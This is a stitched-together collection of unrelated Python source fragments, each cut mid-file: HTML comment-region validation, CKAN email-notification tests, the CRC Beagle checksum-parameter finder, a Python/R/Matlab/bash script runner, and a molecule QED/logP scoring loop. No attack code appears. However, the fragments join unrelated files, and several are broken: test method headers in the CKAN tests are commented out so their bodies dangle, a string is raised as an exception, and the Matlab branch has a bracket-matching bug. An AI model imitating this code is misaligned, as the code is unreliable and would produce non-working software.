if self.get_path(child) == article.root and comment_not_found:
validated = True
break
if self.get_path(child) == grouped_comments[max_group][0].root:
comment_not_found = False
if validated and article.distance_from_root - common.count("/") <= 4:
pass
else:
validated = False
return validated
def big_areas_in_same_level(self, article, grouped_comments, max_group):
"""
Check if the big regions (or areas) belong to the same level in the
HTML tree structure.
"""
if max_group in grouped_comments:
first_candidate_comment = grouped_comments[max_group][0]
return article.distance_from_root == first_candidate_comment.distance_from_root\
and self.combined_region_level_exceeded(article)
else:
return self.combined_region_level_exceeded(article)
def candidate_context_validated(self, article, grouped_comments, max_group):
"""
Check whether the candidate comment regions validate as such based on
the keywords that are detected in their content.
"""
print(Tcolors.ACT + " Validating candidate | |
# encoding: utf-8
import time
import pytest
import ckan.model as model
import ckan.tests.legacy as tests
import ckan.tests.helpers as helpers
from ckan.tests.legacy import TestController as ControllerTestCase
class TestEmailNotifications(ControllerTestCase):
@classmethod
def setup_class(cls):
model.repo.rebuild_db()
tests.CreateTestData.create()
cls.app = helpers._get_test_app()
joeadmin = model.User.get("joeadmin")
cls.joeadmin = {"id": joeadmin.id, "apikey": joeadmin.apikey}
testsysadmin = model.User.get("testsysadmin")
cls.testsysadmin = {
"id": testsysadmin.id,
"apikey": testsysadmin.apikey,
}
annafan = model.User.get("annafan")
cls.annafan = {"id": annafan.id, "apikey": annafan.apikey}
# Register a new user.
cls.sara = tests.call_action_api(
cls.app,
"user_create",
apikey=cls.testsysadmin["apikey"],
name="sara",
email="<EMAIL>",
password="<PASSWORD>",
fullname="<NAME>",
activity_streams_email_notifications=True,
)
def check_email(self, email, address, name, subject):
assert email[1] == "<EMAIL>"
assert email[2] == [address]
encoded_subject = "Subject: =?utf-8?q?{subject}".format(
subject=subject.replace(" ", "_")
)
assert encoded_subject in email[3]
# TODO: Check that body contains link to dashboard and email prefs.
def test_00_send_email_notifications_not_logged_in(self, mail_server):
"""Not-logged-in users shouldn't be able to send email notifications.
"""
tests.call_action_api(self.app, "send_email_notifications", status=403)
# def test_00_send_email_notifications_not_authorized(self):
"""Unauthorized users shouldn't be able to send email notifications.
"""
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.annafan["apikey"],
status=403,
)
# def test_01_no_email_notifications_after_registration(self):
"""A new user who isn't following anything shouldn't get any emails."""
# Clear any emails already sent due to CreateTestData.create().
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
mail_server.clear_smtp_messages()
# No notification emails should be sent to anyone at this point.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0
# def test_02_one_new_activity(self):
"""A user with one new activity should get one email."""
# Make Sara follow something, have to do this to get new activity.
tests.call_action_api(
self.app,
"follow_dataset",
apikey=self.sara["apikey"],
id="warandpeace",
)
# Make someone else update the dataset Sara's following, this should
# create a new activity on Sara's dashboard.
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
name="warandpeace",
notes="updated",
)
# Run the email notifier job, it should send one notification email
# to Sara.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 1
email = mail_server.get_smtp_messages()[0]
self.check_email(
email,
"<EMAIL>",
"<NAME>",
"1 new activity from CKAN",
)
# def test_03_multiple_new_activities(self):
"""Test that a user with multiple new activities gets just one email.
"""
# Make someone else update the dataset Sara's following three times,
# this should create three new activities on Sara's dashboard.
for i in range(1, 4):
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
name="warandpeace",
notes="updated {0} times".format(i),
)
# Run the email notifier job, it should send one notification email
# to Sara.
mail_server.clear_smtp_messages()
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 1
email = mail_server.get_smtp_messages()[0]
self.check_email(
email,
"<EMAIL>",
"<NAME>",
"3 new activities from CKAN",
)
mail_server.clear_smtp_messages()
# def test_04_no_repeat_email_notifications(self):
"""Test that a user does not get a second email notification for the
same new activity.
"""
# TODO: Assert that Sara has some new activities and has already had
# an email about them.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0
# def test_05_no_email_if_seen_on_dashboard(self):
"""Test that emails are not sent for activities already seen on dash.
If a user gets some new activities in her dashboard activity stream,
then views her dashboard activity stream, then she should not got any
email notifications about these new activities.
"""
# Make someone else update the dataset Sara's following, this should
# create a new activity on Sara's dashboard.
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
name="warandpeace",
notes="updated by test_05_no_email_if_seen_on_dashboard",
)
# At this point Sara should have a new activity on her dashboard.
num_new_activities = tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
assert num_new_activities > 0, num_new_activities
# View Sara's dashboard.
tests.call_action_api(
self.app,
"dashboard_mark_activities_old",
apikey=self.sara["apikey"],
)
# No email should be sent.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0
# def test_05_no_email_notifications_when_disabled_site_wide(self):
"""Users should not get email notifications when the feature is
disabled site-wide by a sysadmin."""
# def test_06_enable_email_notifications_sitewide(self):
"""When a sysadamin enables email notifications site wide, users
should not get emails for new activities from before email
notifications were enabled.
"""
# It's just easier to separate these tests into their own test class.
class TestEmailNotificationsUserPreference(ControllerTestCase):
"""Tests for the email notifications (on/off) user preference."""
@classmethod
def setup_class(cls):
model.repo.rebuild_db()
tests.CreateTestData.create()
cls.app = helpers._get_test_app()
joeadmin = model.User.get("joeadmin")
cls.joeadmin = {"id": joeadmin.id, "apikey": joeadmin.apikey}
testsysadmin = model.User.get("testsysadmin")
cls.testsysadmin = {
"id": testsysadmin.id,
"apikey": testsysadmin.apikey,
}
cls.sara = tests.call_action_api(
cls.app,
"user_create",
apikey=cls.testsysadmin["apikey"],
name="sara",
email="<EMAIL>",
password="<PASSWORD>",
fullname="<NAME>",
)
def test_00_email_notifications_disabled_by_default(self, mail_server):
"""Email notifications should be disabled for new users."""
assert self.sara["activity_streams_email_notifications"] is False
assert (
tests.call_action_api(
self.app, "user_show", apikey=self.sara["apikey"], id="sara"
)["activity_streams_email_notifications"]
is False
)
# def test_01_no_email_notifications_when_disabled(self):
"""Users with email notifications turned off should not get emails."""
# First make Sara follow something so she gets some new activity in
# her dashboard activity stream.
tests.call_action_api(
self.app,
"follow_dataset",
apikey=self.sara["apikey"],
id="warandpeace",
)
# Now make someone else update the dataset so Sara gets a new activity.
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
id="warandpeace",
notes="updated",
)
# Test that Sara has a new activity, just to make sure.
assert (
tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
> 0
)
# No email notifications should be sent to Sara.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0
# def test_02_enable_email_notifications(self):
"""Users should be able to turn email notifications on."""
# Mark all Sara's new activities as old, just to get a fresh start.
tests.call_action_api(
self.app,
"dashboard_mark_activities_old",
apikey=self.sara["apikey"],
)
assert (
tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
== 0
)
# Update the followed dataset a few times so Sara gets a few new
# activities.
for i in range(1, 4):
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
id="warandpeace",
notes="updated {0} times".format(i),
)
# Now Sara should have new activities.
assert (
tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
== 3
)
# Run the email notifier job.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0
# Enable email notifications for Sara.
self.sara["activity_streams_email_notifications"] = True
tests.call_action_api(self.app, "user_update", **self.sara)
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0, (
"After a user enables "
"email notifications she should _not_ get emails about activities "
"that happened before she enabled them, even if those activities "
"are still marked as 'new' on her dashboard."
)
# Update the package to generate another new activity.
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
id="warandpeace",
notes="updated yet again",
)
# Check that Sara has a new activity.
assert (
tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
== 4
)
# Run the email notifier job, this time Sara should get one email.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 1
mail_server.clear_smtp_messages()
# def test_03_disable_email_notifications(self):
"""Users should be able to turn email notifications off."""
self.sara["activity_streams_email_notifications"] = False
tests.call_action_api(self.app, "user_update", **self.sara)
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
id="warandpeace",
notes="updated yet again",
)
assert (
tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
> 0
)
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
)
assert len(mail_server.get_smtp_messages()) == 0
class TestEmailNotificationsIniSetting(object):
"""Tests for the ckan.activity_streams_email_notifications config setting.
"""
@classmethod
def setup_class(cls):
# Disable the email notifications feature.
cls.app = helpers._get_test_app()
model.repo.rebuild_db()
tests.CreateTestData.create()
joeadmin = model.User.get("joeadmin")
cls.joeadmin = {"id": joeadmin.id, "apikey": joeadmin.apikey}
testsysadmin = model.User.get("testsysadmin")
cls.testsysadmin = {
"id": testsysadmin.id,
"apikey": testsysadmin.apikey,
}
@pytest.mark.ckan_config("ckan.activity_streams_email_notifications", False)
def test_00_send_email_notifications_feature_disabled(self, mail_server):
"""Send_email_notifications API should error when feature disabled."""
# Register a new user.
sara = tests.call_action_api(
self.app,
"user_create",
apikey=self.testsysadmin["apikey"],
name="sara",
email="<EMAIL>",
password="<PASSWORD>",
fullname="<NAME>",
)
# Save the user for later tests to use.
TestEmailNotificationsIniSetting.sara = sara
# Enable the new user's email notifications preference.
sara["activity_streams_email_notifications"] = True
tests.call_action_api(self.app, "user_update", **sara)
assert (
tests.call_action_api(
self.app, "user_show", apikey=self.sara["apikey"], id="sara"
)["activity_streams_email_notifications"]
is True
)
# Make Sara follow something so she gets some new activity in her
# dashboard activity stream.
tests.call_action_api(
self.app,
"follow_dataset",
apikey=self.sara["apikey"],
id="warandpeace",
)
# Now make someone else update the dataset so Sara gets a new activity.
tests.call_action_api(
self.app,
"package_update",
apikey=self.joeadmin["apikey"],
id="warandpeace",
notes="updated",
)
# Test that Sara has a new activity, just to make sure.
assert (
tests.call_action_api(
self.app,
"dashboard_new_activities_count",
apikey=self.sara["apikey"],
)
> 0
)
# We expect an error when trying to call the send_email_notifications
# API, because the feature is disabled by the ini file setting.
tests.call_action_api(
self.app,
"send_email_notifications",
apikey=self.testsysadmin["apikey"],
status=409,
)
@pytest.mark.ckan_config("ckan.activity_streams_email_notifications", False)
def test_01_no_emails_sent_if_turned_off(self, mail_server):
"""No emails should be sent if the feature is disabled site-wide."""
# No emails should have been sent by the last test.
assert len(mail_server.get_smtp_messages()) == 0
class TestEmailNotificationsSinceIniSetting(ControllerTestCase):
"""Tests | |
<filename>crcbeagle/crcbeagle.py
#
# CRC Beagle, automatic CRC/Checksum detection for communication protocols.
#
# Copyright (C) <NAME>, 2021.
#
# See https://github.com/colinoflynn/crcbeagle for more details.
#
# See LICENSE file for distribution requirements.
#
# CRC differential technique based on Gregory Ewing
# https://www.cosc.canterbury.ac.nz/greg.ewing/essays/CRC-Reverse-Engineering.html
#
import logging
import struct
from crccheck.crc import Crc8Base, Crc16Base, Crc32Base, ALLCRCCLASSES
class CRCBeagle(object):
"""
CRCBeagle searches for matching CRC parameters based on several passed messages.
described by Gregory Ewing which avoids needing to fully understand the actual
CRC input settings, which is very useful when reverse engineering communications
protocols.
The basic usage is simply to pass 2 to 4 example messages & CRC pairs:
```
crcb = crcbeagle.CRCBeagle()
crcb.search(
[[165, 16, 2, 7, 85, 163, 209, 114, 21, 131, 143, 144, 52, 187, 183, 142, 180, 39, 169, 76],
[165, 16, 2, 7, 140, 39, 242, 202, 181, 209, 220, 248, 156, 112, 66, 128, 236, 187, 35, 176],
[165, 16, 2, 7, 113, 105, 30, 118, 164, 96, 43, 198, 84, 170, 123, 76, 107, 225, 133, 194]],
[[253, 14],
[90, 38],
[248, 236]])
```
"""
def crcdict_to_packstr(self, crcdict):
"""
Based on the 'crclen' and 'order' fields of `crcdict` returns a string used by
struct to pack/unpack the CRC.
"""
crclen = crcdict['crclen']
if crclen == 1:
packstr = "B"
elif crclen == 2:
if crcdict["order"] == "le":
packstr = "<H"
elif crcdict["order"] == "be":
packstr = ">H"
else:
raise ValueError("Invalid 'order': " + crcdict["order"])
elif crclen == 4:
if crcdict["order"] == "le":
packstr = "<I"
elif crcdict["order"] == "be":
packstr = ">I"
else:
raise ValueError("Invalid 'order': " + crcdict["order"])
else:
raise ValueError("Invalid crclen: %d"%crclen)
return packstr
def str_crc_example(self, crcdict, message=None):
"""
Generates example code for using the CRC parameters based on `crccheck` library.
Optional `message` parameter should be a list or bytearray that will be passed to
the resulting crc function, normally this message would be one of the examples.
"""
crclen = crcdict['crclen']
packstr = self.crcdict_to_packstr(crcdict)
example_str = "import struct\n"
if crclen == 1:
example_str += "from crccheck.crc import Crc8Base\ncrc = Crc8Base\n"
elif crclen == 2:
example_str += "from crccheck.crc import Crc16Base\ncrc = Crc16Base\n"
else:
example_str += "from crccheck.crc import Crc32Base\ncrc = Crc32Base\n"
example_str += "def my_crc(message):\n"
example_str += " crc._poly = 0x%X\n"%crcdict['poly'] +\
" crc._reflect_input = %r\n"%crcdict['reflectin'] +\
" crc._reflect_output = %r\n"%crcdict['reflectout'] +\
" crc._initvalue = 0x%0X\n"%crcdict['init'] +\
" crc._xor_output = 0x%0X\n"%crcdict['xor_output']
example_str += " output_int = crc.calc(message)\n"
example_str += ' output_bytes = struct.pack("%s", output_int)\n'%packstr
example_str += " output_list = list(output_bytes)\n"
example_str += " return (output_int, output_bytes, output_list)\n"
if message:
example_str += "\n"
example_str += "m = %r\n"%message
example_str += "output = my_crc(m)\n"
example_str += "print(hex(output[0]))"
return example_str
def print_crc_example(self, crcdict, message=None):
"""
Prints to stdout example code for using the CRC parameters based on `crccheck` library.
Optional `message` parameter should be a list or bytearray that will be passed to
the resulting crc function, normally this message would be one of the examples.
"""
print(self.str_crc_example(crcdict, message))
def validate_inputs(self, messages, crcs):
"""
Sanity checks input data, such as CRC lengths match. Prints status of
input parameters for user pleasure.
"""
if len(messages) != len(crcs):
raise ValueError("Length of message & crc arrays don't match: %d, %d"%(len(messages), len(crcs)))
logging.info("Got %d input message-crc pairs"%len(messages))
#Figure out how many messages are same size
message_size_dict = {}
for i, m in enumerate(messages):
l = len(m)
if l not in message_size_dict.keys():
message_size_dict[l] = {"num":1, "indexes":[i]}
else:
message_size_dict[l]["num"] += 1
message_size_dict[l]["indexes"].append(i)
#Basic CRC input validation
crclen = None
for c in crcs:
try:
if crclen is None:
crclen = len(c)
else:
if len(c) != crclen:
raise ValueError("Expect CRC inputs to be same array length, expected %d, found %d (%s)"%(crclen, len(c), str(c)))
except TypeError:
raise TypeError("CRC must be passed as byte list or bytearray, not int")
if crclen != 1 and crclen != 2 and crclen != 4:
raise("Detected %d-bit CRC, not supported"%(crclen *8))
print("Input parameters:")
print(" %d-bit CRC size"%(crclen * 8))
print(" %d total messages, with:"%len(messages))
for k in message_size_dict.keys():
print(" %2d messages with %d byte payload"%(message_size_dict[k]["num"], k))
self.message_size_dict = message_size_dict
self.crclen = crclen
def search_linear(self, messages, crcs, print_examples=True):
"""
Checks if a simple checksum can provide the required CRC,
currently only valid for 8-bit 'crc'. Used to confirm the
device hasn't just implemented a simple checksum instead of
a real crc.
"""
if self.crclen == 1:
logging.info("Checking for linear code")
else:
logging.info("16-bit or 32-bit CRC, skipping linear code check")
return False
diffout = []
# Linear code that is a real checksum
for i, m in enumerate(messages):
test = 0
for d in m:
test += d
test &= 0xff
diffout.append(test ^ crcs[i][0])
if len(set(diffout)) == 1:
print("\nPossible linear code and not CRC: sum(m) XOR 0x%02X"%diffout[0])
print("This solution works on all %d inputs!"%len(messages))
if print_examples:
print("********** example usage *************")
print("def my_checksum(message):")
print(" checksum = 0")
print(" for d in message:")
print(" checksum += d")
print(" checksum = (checksum & 0xff) ^ 0x%02x"%diffout[0])
print(" return checksum")
print("**************************************")
return True
diffout = []
# Linear code that XORs each byte
for i, m in enumerate(messages):
test = 0
for d in m:
test ^= d
test &= 0xff
diffout.append(test ^ crcs[i][0])
if len(set(diffout)) == 1:
print("\nPossible linear code and not CRC: xorsum(m) XOR 0x%02X"%diffout[0])
print("This solution works on all %d inputs!"%len(messages))
if print_examples:
print("********** example usage *************")
print("def my_checksum(message):")
print(" checksum = 0")
print(" for d in message:")
print(" checksum ^= d")
print(" checksum = (checksum & 0xff) ^ 0x%02x"%diffout[0])
print(" return checksum")
print("**************************************")
return True
return False
def search(self, messages, crcs, print_examples=True):
"""
Uses input `messages`-`crcs` pairs to find potential crc parameters.
Normally the crc would just be the ending bytes of the message. The crc size
is detected based on number of bytes for each crc. The crc endianness will be
auto detected, so pass the crc in the same manner as used in your communication
protocol.
"""
self.validate_inputs(messages, crcs)
message_size_dict = self.message_size_dict
if len(message_size_dict.keys()) == 1:
print("NOTE: Output parameters may be specific to this message size only. Pass different length messages if possible.")
self.search_linear(messages, crcs, print_examples)
candidates = []
## Searching
for message_len in message_size_dict.keys():
print("\nWorking on messages of %d length: "%(message_len))
if message_size_dict[message_len]["num"] > 1:
#Need at least two messages of this length to do difference...
diffsets = []
for i, idx in enumerate(message_size_dict[message_len]["indexes"]):
try:
msg1idx = message_size_dict[message_len]["indexes"][i+0]
msg2idx = message_size_dict[message_len]["indexes"][i+1]
logging.info("Using diff between message %d & %d"%(msg1idx, msg2idx))
diff = [messages[msg1idx][i] ^ messages[msg2idx][i] for i in range(0, len(messages[msg1idx]))]
diffcrc = [crcs[msg1idx][i] ^ crcs[msg2idx][i] for i in range(0, len(crcs[msg1idx]))]
for d in ALLCRCCLASSES:
if d._width == self.crclen * 8:
logging.debug("Trying class: %r"%d)
res = d.calc(messages[msg1idx])
# We'll figure out actual XOR output later
d._xor_output = 0
d._initvalue = 0 # This will get packed into _xor_output
# at some point should be smarter about it, and set
# init value to 'real' one to see if that is case.
res = d.calc(diff)
#Deal with unknown CRC order, kinda hacky but YOLO
if self.crclen == 1:
if diffcrc[0] == res:
candidates.append({"class":d, "order":"le"})
packstr = "B"
if self.crclen == 2 or self.crclen == 4:
if self.crclen == 2:
packstr = "H"
else:
packstr = "I"
testcrc = list(struct.pack("<"+packstr, res)) #LE
if list(diffcrc) == testcrc:
candidates.append({"class":d, "order":"le"})
testcrc = list(struct.pack(">"+packstr, res)) #BE
if list(diffcrc) == testcrc:
candidates.append({"class":d, "order":"be"})
cset = set()
for c in candidates:
#Convert to string to make validating in set easier, will convert back later
newc = "poly:"+hex(c["class"]._poly)+" reflectin:"+str(c["class"]._reflect_input) +\
" reflectout:"+str(c["class"]._reflect_output)+" init:"+hex(c["class"]._initvalue) +\
" order:"+c["order"] + " crclen:"+str(self.crclen)
cset.add(newc)
if len(cset) == 0:
logging.warning("No parameters for difference messages %d to %d"%(msg1idx, msg2idx))
else:
logging.info("Parameters for difference messages: %s"%str(cset))
diffsets.append(cset)
except IndexError as e:
#TODO - overextends itself and uses | |
= not _ignore
elif not _ignore and _l[_i] in '#%':
# if we're not in a string and it's a comment
break # stop before here
_i += 1
_l = _l[:_i]
# get the code to run
# have to bundle for subprocess.run
_to_exec = [_l] if _l and _l[0] not in '%#' else []
while _l and _l[:2] not in ['#!','%!'] and _end < len(_lines)-1:
_end += 1
_l = _lines[_end]
if _l and _l[0] not in '%#':
# ignore comments
_i = 0
_ignore = False
while _i < len(_l):
if _l[_i] in '\'"':
_ignore = not _ignore
elif not _ignore and (_l[_i] in '#%'):
break
_i += 1
_to_exec.append(_l[:_i])
# run in terminal
# raises error if return code not 0
if _verbosity == 0: subprocess.run('\n'.join(_to_exec), shell=True, env={k:str(v) for k,v in _environ.items()}, executable='/bin/bash', stdout=open('/dev/null', 'w')).check_returncode()
else: subprocess.run('\n'.join(_to_exec), shell=True, env={k:str(v) for k,v in _environ.items()}, executable='/bin/bash').check_returncode()
# update and move on
_environ = os.environ.copy()
_counter = _end+1 if _end == len(_lines)-1 else _end
continue
# if currently in R
elif _lang == 'r':
if _current_line[:2] in ['#!','%!']: # switching environments
if 'p' in _current_line.lower().split('->')[0]: # if switching to Python
if _verbosity >= 2: print('Switching to Python')
_lang = 'p'
r_to_py(_current_line, _r_object)
elif 'm' in _current_line.lower().split('->')[0]: # if switching to Matlab
if _verbosity >= 2: print('Switching to Matlab')
_lang = 'm'
_mat_object = r_to_mat(_current_line, _r_object, _mat_object)
elif 'b' in _current_line.lower().split('->')[0]: # if switching to bash
if _verbosity >= 2: print('Switching to bash')
_lang = 'b'
_environ = r_to_bash(_line, _environ)
_counter += 1
continue
else: # otherwise do the thing
# go through the code
_end = _counter
while _end < len(_lines) and _lines[_end].strip()[:2] not in ['#!', '%!']:
_l = _lines[_end].strip()
if _l and _l[0] not in '#%':
# remove comments
_i = 0
_ignore = False
while _i < len(_l):
if _l[_i] in '\'"':
_ignore = not _ignore
elif not _ignore and (
_l[_i] == '#' or (
_l[_i] == '%' and
# have to ignore all the %...% operators
not any([('%' + j + '%') in _l[_i:_i+10] for j in
['in','between', 'chin', '+', '+replace',':','do','dopar',
'>','<>','T>','/', '*','o','x','*']
])
)
):
break
_i += 1
# do the thing
_r_object.sendline(_l[:_i])
if _verbosity > 0 and len(_r_object.before.split(_l[:_i])) > 1:
_temp = _r_object.before.split(_l[:_i])[1].strip()
if _temp: print(_temp)
_end += 1
# move on
_counter = _end
continue
# if currently in Matlab
elif _lang == 'm':
if _current_line[:2] == '#!': # switching environments
if 'p' in _current_line.lower().split('->')[0]:
if _verbosity >= 2: print('Switching to Python')
_lang = 'p'
mat_to_py(_current_line, _mat_object)
elif 'r' in _current_line.lower().split('->')[0]:
if _verbosity >= 2: print('Switching to R')
_lang = 'r'
_r_object = mat_to_r(_current_line, _mat_object, _r_object)
elif 'b' in _current_line.lower().split('->')[0]:
if _verbosity >= 2: print('Switching to bash')
_lang = 'b'
_environ = mat_to_bash(_line, _environ)
_counter += 1
continue
else: # otherwise do the thing
# go through the code
_end = _counter
_done = ''
while _end < len(_lines) and _lines[_end].strip()[:2] not in ['#!', '%!']:
_l = _lines[_end].strip()
if _l and _l[0] not in '%#':
# skip comments
_i = 0
_ignore = False
while _i < len(_l):
if _l[_i] in '\'"':
_ignore = not _ignore
elif not _ignore and (_l[_i] in '#%'):
break
_i += 1
# do the thing
# if command doesn't finish, matlab doesn't send anything in return
_mat_object.send(_l[:_i] + '\n')
_mat_object.expect('\r\n')
if _l[-3:] == '...':
# if end with line continuation, nothing
continue
# look for balancing things to see if done
for i in _l:
if i in '([{':
_done += i
elif i in ')]}':
try:
if i == ')' and _done[-1] == '(':
_done = _done[:-1]
elif i == ']' and _done[-1] == '[':
_done = _done[:-1]
elif i == '}' and _done[-1] == '}':
_done = _done[-1]
except Exception:
pass
if len(_done) == 0:
# if everything matches up, start over
_mat_object.expect('>>')
if _verbosity >= 1 and _mat_object.before != '':
# print if we're printing
print(_mat_object.before)
_end += 1
# move on
_counter = _end
continue
else: # shouldn't get here ever
raise ValueError('Invalid definition of _lang, contact <EMAIL>.')
# return
ret = Master(r_object = _r_object, mat_object = _mat_object, environ = _environ)
ret.load_from_dict(_VARIABLES)
return ret
# -------------------------------- Main Classes -------------------------------- #
class Master:
"""An interactive Multilang environment
Allows for interfacing with R, Matlab, and bash environments.
Relies on RObject and MatlabObject classes, and `subprocess.run`.
Unlike in scripts, do not pass misformatted comments.
R/bash - # only
Matlab - % or '%{...%}' only
The Python environment here is only a dictionary to load/store variables.
All Python code is expected to be run directly by the user.
Properties
----------
who
Returns {'X': who_X} for all X
who_X
Returns a list of the names of all variables in the X environment
r_object
The underlying R environment
isalive_r
If the underlying R environment is alive
mat_object, m_object, matlab_object
The underlying Matlab environment
isalive_mat, isalive_m, isalive_matlab
If the underlying Matlab environment is alive
bash_object
The dict of variables underlying the bash environment
Functions
---------
connect
Connect to the underlying environments
reconnect
Reconnect to the underlying environments
dump_all
Return all variables from all environments
load, load_to_py, to_py
Add variable to the Python variable dictionary
load_from_dict
Add variables to the Python variable dictionary
drop
Drop variable(s) from the Python variable dictionary
dump_py
Return the Python variable dictionary
For X in [r, bash, mat/m/matlab]:
connect_X
Connect to the underlying R environment
X
Run X code
X_to_mat, X_to_m, X_to_matlab
Move variable(s) from X to Matlab
X_to_r
Move variable(s) from X to R
dump_X
Get all variables from X
Or move all variables from X to the Python variable dictionary
X_to_py
Move variable(s) from X to the Python variable dictionary
Or get variable(s) from X
X_to_bash
Move variable(s) from R to bash
py_to_X
Move variable(s) from the Python variable dictionary to X
dump_to_X
Move all variables from the Python variable dictionary to X
"""
def __init__(self, r : bool = True, mat : bool = True, load_r : bool = False,
r_object : RObject = None, mat_object : MatlabObject = None, environ : dict = None,
timeout : int = 600, m : bool = True, matlab : bool = True):
"""Setup a Master object
Parameters
----------
r : bool
Whether to connect to an R environment on startup
r_object : RObject
An existing R environment to use
Default: new MatlabObject()
load_r : bool
Whether to load the existing workspace in R
Default: False
Default: new RObject()
Default: True
mat : bool
Or @m or @matlab
Whether to connect to a Matlab environment on startup
Default: True
mat_object: MatlabObject
An existing Matlab environment to use
environ : dict[str: str,int,float]
A dictionary to use for the bash environment
Default: os.environ
timeout : int
Number of seconds until time out
Only used if new R or Matlab environments are being generated
Default: 600
Returns
-------
Master
Initialized object
"""
if system() == 'Windows':
raise NotImplementedError('Not implemented for Windows')
## Setup environments
# R
if not r_object: self._r_object = RObject(r, load_r, timeout)
else: self._r_object = r_object
# Matlab
mat = mat and m and matlab
if not mat_object: self._mat_object = MatlabObject(mat, timeout)
else: self._mat_object = mat_object
# bash
if not environ: self. _environ = os.environ.copy()
else: self._environ = environ
self._orig_env = os.environ.copy()
# Python
self._variables = {}
@property
def who(self):
"""Returns {'mat': `who_m`, 'r': `who_r`, 'py':`who_py`}"""
return {'mat': self.who_m, 'r': self.who_r, 'py': self.who_py, 'bash': self.who_bash}
def connect(self, r : bool = True, mat : bool = True, load_r : bool = False):
"""Connect to the underlying environments.
Does nothing if target environment already connected
Parameters
----------
r : bool
Whether to connect to the R environment
Default: True
load_r : bool
Whether to load the existing workspace in R
mat : bool
Whether to connect to the Matlab environment
Default: True
"""
if r: self.connect_r(load_r)
if mat: self.connect_mat()
def reconnect(self, r : bool = True, mat : bool = True, force : bool = True, load_r : bool = False):
"""Reconnect to the underlying enviroments
Parameters
----------
r : bool
Whether to connect to the R environment
Default: True
load_r : bool
Whether to load the existing workspace in R
mat : bool
Whether to connect to the Matlab environment
Default: True
force : bool
Whether to force reconnection
Default: True
"""
if r: self.r_object.reconnect(force, load_r)
if mat: self.mat_object.reconnect(force)
def to_py(self, name : str, value):
"""See `load`"""
self.load(name, value)
def load_to_py(self, name : str, value):
"""See `load`"""
self.load(name, value)
def load(self, name : str, value):
"""Loads the given Python variable as {name: value}"""
self._variables[name] = value
def drop(self, name):
"""Drop the given variable(s) from the Python environment"""
if hasattr(name, '__iter__') and not type(name) is str:
[self.drop(i) for i in name]
del self._variables[name]
def load_from_dict(self, d : dict):
"""Add the given Python variables as {name: value}
Use `load_from_dict(globals())` to load all variables
"""
self._variables.update(d)
@property
def who_py(self):
"""Returns a list of Python variables."""
return list(self._variables.keys())
def dump_py(self):
"""Returns the Python variables as a dict of {name:value}"""
return self._variables.copy()
def dump_all(self, precedence : str = 'all', load : bool = False):
"""Get/Load all variables from R and Matlab
Parameters
----------
precedence : None, str in ['all', 'r', 'mat']
If str: sets which environment gets precedence
If 'all': set conflicting variable names as R_name and mat_name
If None: error on conflict
Default: 'all'
load : bool
Whether to load the result into the Python variable dict
Default: False
Returns
-------
dict
{name:value} for all variables in R and Matlab
Raises
------
RuntimeError
If either the R or Matlab environment is not alive
NameError
If @precendence is None and there is a conflicting name
ValueError
If @precendence not in [None, 'r', 'mat', 'all']
"""
# can't do anything
if not self.isalive_r: raise RuntimeError('r_object not alive')
elif not self.isalive_mat: raise RuntimeError('mat_object not alive')
# get all the variables from R
names = self.who_r
random_name = ''.join(choices('abcdefghijklmnopqrstuvwxyz', k=10))
self.r_object.sendline(random_name + '<- tempfile(); ' + random_name)
temp_file = str(self.r_object.before).split('"')[1]
self.r_object.sendlines([
'writeMat(paste(' + random_name + ',".mat", sep=""), ' + ', '.join([i + '=' + | |
RuntimeError as e:
bad_plogp += 1
plogp = -999
print(i+1, Chem.MolToSmiles(mol, isomericSmiles=True), ' error in penalized_log')
results.append((qed, plogp, smile, smile2))
f.write('{},{},{},{}\n'.format(qed, plogp, smile, smile2))
f.flush()
f.close()
results.sort(key=lambda tup: tup[0], reverse=True)
fv = filename.split('.')
f = open(fv[0]+'_sortedByQED.'+fv[1], "w") # append mode
for r in results:
qed, plogp, smile, smile2 = r
f.write('{},{},{},{}\n'.format(qed, plogp, smile, smile2))
f.flush()
f.close()
results.sort(key=lambda tup: tup[1], reverse=True)
fv = filename.split('.')
f = open(fv[0] + '_sortedByPlogp.' + fv[1], "w") # append mode
for r in results:
qed, plogp, smile, smile2 = r
